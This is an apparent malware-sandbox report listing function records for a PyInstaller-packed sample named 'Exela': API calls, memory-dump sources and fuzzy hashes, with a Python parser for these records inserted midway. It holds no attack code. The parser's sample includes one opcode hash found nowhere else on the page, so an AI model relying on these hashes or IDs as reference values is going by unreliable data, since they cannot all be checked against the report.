• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 485612231-0
                                                                                                    • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                    • Instruction ID: 3ba9d389facac25f79b385da1513dc1d9f226e2729bddc8d2a4f4d0838436265
                                                                                                    • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                    • Instruction Fuzzy Hash: 6EE04F50E0831642FF187BB2A45B13891906F84741B8C81B4C91D462A1DE2C68858220
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(?,?,?,00007FF75AEAAA45,?,?,00000000,00007FF75AEAAAFA), ref: 00007FF75AEAAC36
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF75AEAAA45,?,?,00000000,00007FF75AEAAAFA), ref: 00007FF75AEAAC40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 918212764-0
                                                                                                    • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                    • Instruction ID: 477d21ec7612bd668772126a739409cb2da3a58a0e2e06d1601d3fed8709d5b9
                                                                                                    • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                    • Instruction Fuzzy Hash: 3121A821F1C76242FFA47761A45B27D96829F84790FCC42B9EA2E477D1CE6CE4858320
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                    • Instruction ID: c1988d28e1002e279d4d484cac0a04103f6ece80cb91bd8ce46e33ab9a492427
                                                                                                    • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                    • Instruction Fuzzy Hash: 8341F532A0821187FA34BB55E55A279F3A0EF55B40F9C4171EA8E87691CF2DE802CB61
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 840049012-0
                                                                                                    • Opcode ID: 690dc6b67f817d594e91469c9844e6c3b6f2191f13bc332efa466ce869a3b8e8
                                                                                                    • Instruction ID: 0161e380bada3dc8dbcb64a249062d881bad0c31413e3b9cded1b703a1518053
                                                                                                    • Opcode Fuzzy Hash: 690dc6b67f817d594e91469c9844e6c3b6f2191f13bc332efa466ce869a3b8e8
                                                                                                    • Instruction Fuzzy Hash: 97219121B087728AFA10BA126516BFAEA51BF45BD4FCC5470EE4D07786CE7EE041C720
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                    • Instruction ID: 7522892212e0090d612d09d23144962a1362839e067a0f634cb4ac9389392f4a
                                                                                                    • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                    • Instruction Fuzzy Hash: D031BE32A1866286F7517B55984B37CAA60AF40BA4FCA51B5EA2D033D2CF7CE8418731
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3947729631-0
                                                                                                    • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                    • Instruction ID: e7df6162451b1382e36028372662225ca7eee501c22f31b918b78909dd21ca01
                                                                                                    • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                    • Instruction Fuzzy Hash: 66218E32A047968AFB24BF64C44A2FC73A0EF44718F88467AD62D06AD5DF38D584C760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                    • Instruction ID: dfc57e5b18331b03d02219bf6d1de5abfb095ae863bf1f6fff83102600040cec
                                                                                                    • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                    • Instruction Fuzzy Hash: B4116326A1C66282FA60BF51A40627EE2A4BF45B80FDC40B1FB4C57B96DF3DD5418730
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                    • Instruction ID: 1436b58a24f9e5537ebd7dd05e69ea6343ea388c359d5b3516914feeb88a895c
                                                                                                    • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                    • Instruction Fuzzy Hash: 1921B372608B9686E761BF18E446379B6A0FF85B54F984334E79D476D5DF3CD8008B10
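The function records above (APIs, Memory Dump Source, Similarity) are what an analyst pulls out of this report to pivot on across samples: the call-site addresses tie each record to the IDA snapshot, and the Opcode ID / Instruction Fuzzy Hash pairs are the values fed into similarity searches. The parser below is an added example written for this page, not Joe Sandbox code or a published description of its export format. It assumes the layout exactly as reproduced here (one record per "APIs" header, bullet fields written as "Key: value"), strips the "Download File" link text that the page export fused onto the .sdmp names, keeps each call site's address and module, and flags a record cut off before its Instruction Fuzzy Hash, as the last record on this page is. The embedded sample is constructed from three of the records on this page with call arguments shortened.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: three records abridged from this page (call arguments shortened,
# hashes as printed). The trailing "Download File" is link text fused in by the page export.
SAMPLE = """\
APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF75AEB2D92), ref: 00007FF75AEAA9CE
• GetLastError.KERNEL32(?,?,?,00007FF75AEB2D92), ref: 00007FF75AEAA9D8
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
• Instruction ID: 3ba9d389facac25f79b385da1513dc1d9f226e2729bddc8d2a4f4d0838436265
• Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
• Instruction Fuzzy Hash: 6EE04F50E0831642FF187BB2A45B13891906F84741B8C81B4C91D462A1DE2C68858220
APIs
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• API String ID: 3947729631-0
• Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
• Instruction ID: e7df6162451b1382e36028372662225ca7eee501c22f31b918b78909dd21ca01
• Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
• Instruction Fuzzy Hash: 66218E32A047968AFB24BF64C44A2FC73A0EF44718F88467AD62D06AD5DF38D584C760
APIs
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• API String ID: 3215553584-0
• Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction ID: 30ad2407d49361679c6fa5feb80e9bad6b5d3437141dd04d202c49cf9c38207d
• Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
"""

# "• Name.MODULE(args), ref: ADDRESS" as printed under the APIs header
API_CALL = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
FIELD = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")  # "• Key: value"
HEADERS = ("APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
RESIDUE = "Download File"


@dataclass
class FunctionRecord:
    apis: list[tuple[str, str, str]] = field(default_factory=list)  # (name, module, call-site address)
    fields: dict[str, str] = field(default_factory=dict)            # "Opcode ID" -> value, etc.
    associated: list[str] = field(default_factory=list)             # associated .sdmp names


def parse_report(text: str) -> list[FunctionRecord]:
    """One FunctionRecord per 'APIs' header; other text (preamble, graph dumps) is skipped."""
    records: list[FunctionRecord] = []
    current, section = None, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line in HEADERS:
            if line == "APIs":                      # every record opens with APIs
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is None or not line.startswith("•"):
            continue
        elif section == "APIs":
            m = API_CALL.match(line)
            if m:
                current.apis.append((m["name"], m["module"], m["ref"].upper()))
        elif (m := FIELD.match(line)):
            key, value = m["key"].strip(), m["value"].strip()
            if value.endswith(RESIDUE):             # "...sdmpDownload File" -> "...sdmp"
                value = value[: -len(RESIDUE)].rstrip()
            if key == "Associated":
                current.associated.append(value)
            else:
                current.fields[key] = value
    return records


def api_call_sites(records: list[FunctionRecord]) -> dict[str, str]:
    """Call-site address -> MODULE!Name, for cross-referencing the IDA snapshot."""
    return {ref: f"{module}!{name}" for r in records for name, module, ref in r.apis}


def consistency_issues(records: list[FunctionRecord]) -> list[str]:
    """Flag records cut short, and any where Opcode ID and Opcode Fuzzy Hash disagree
    (on this page the two are always printed identical)."""
    issues = []
    for i, r in enumerate(records):
        f = r.fields
        if f.get("Opcode ID") != f.get("Opcode Fuzzy Hash"):
            issues.append(f"record {i}: Opcode ID differs from Opcode Fuzzy Hash")
        for key in ("Opcode ID", "Instruction ID", "Instruction Fuzzy Hash"):
            if key not in f:
                issues.append(f"record {i}: missing {key}")
    return issues


if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for rec in recs:
        print(rec.fields.get("API ID"), rec.fields.get("Instruction Fuzzy Hash", "<truncated>"))
    print(consistency_issues(recs))
```

Run parse_report over the text of a report section and check consistency_issues before feeding the hashes into a similarity search: a record cut off mid-way (like the final one on this page) would otherwise contribute a partial hash set and skew the match.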
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
APIs
  • Part of subcall function 00007FF75AE99400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF75AE945E4,00000000,00007FF75AE91985), ref: 00007FF75AE99439
• LoadLibraryExW.KERNEL32(?,00007FF75AE96466,?,00007FF75AE9336E), ref: 00007FF75AE99092
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: ByteCharLibraryLoadMultiWide
• String ID:
• API String ID: 2592636585-0
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF75AEA0D00,?,?,?,00007FF75AEA236A,?,?,?,?,?,00007FF75AEA3B59), ref: 00007FF75AEAD6AA
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
Strings
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
APIs
Memory Dump Source
• Source File: 0000004D.00000002.2096619014.00007FFB08031000.00000040.00000001.01000000.00000020.sdmp, Offset: 00007FFB08030000, based on PE: true
• Associated: 0000004D.00000002.2096591330.00007FFB08030000.00000002.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB08094000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB080E3000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB0813C000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB08141000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB08144000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2097320655.00007FFB08145000.00000080.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2097353575.00007FFB08147000.00000004.00000001.01000000.00000020.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ffb08030000_Exela.jbxd
Similarity
• API ID: 00007C8119ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 2840558886-0
APIs
• FindFirstFileW.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE9841B
• RemoveDirectoryW.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE9849E
• DeleteFileW.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984BD
• FindNextFileW.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984CB
• FindClose.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984DC
• RemoveDirectoryW.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984E5
Strings
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
APIs
Memory Dump Source
• Source File: 0000004D.00000002.2096619014.00007FFB08031000.00000040.00000001.01000000.00000020.sdmp, Offset: 00007FFB08030000, based on PE: true
• Associated: 0000004D.00000002.2096591330.00007FFB08030000.00000002.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB08094000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB080E3000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB0813C000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB08141000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB08144000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2097320655.00007FFB08145000.00000080.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2097353575.00007FFB08147000.00000004.00000001.01000000.00000020.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ffb08030000_Exela.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 349153199-0
APIs
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB41F
• FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB43E
• FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB466
• FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB477
• FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB488
Memory Dump Source
• Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
Strings
Memory Dump Source
• Source File: 0000004D.00000002.2096619014.00007FFB08031000.00000040.00000001.01000000.00000020.sdmp, Offset: 00007FFB08030000, based on PE: true
• Associated: 0000004D.00000002.2096591330.00007FFB08030000.00000002.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB08094000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB080E3000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB0813C000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB08141000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2096619014.00007FFB08144000.00000040.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2097320655.00007FFB08145000.00000080.00000001.01000000.00000020.sdmp
• Associated: 0000004D.00000002.2097353575.00007FFB08147000.00000004.00000001.01000000.00000020.sdmp
Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ffb08030000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: 00007B6570
                                                                                                    • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                    • API String ID: 4069847057-87138338
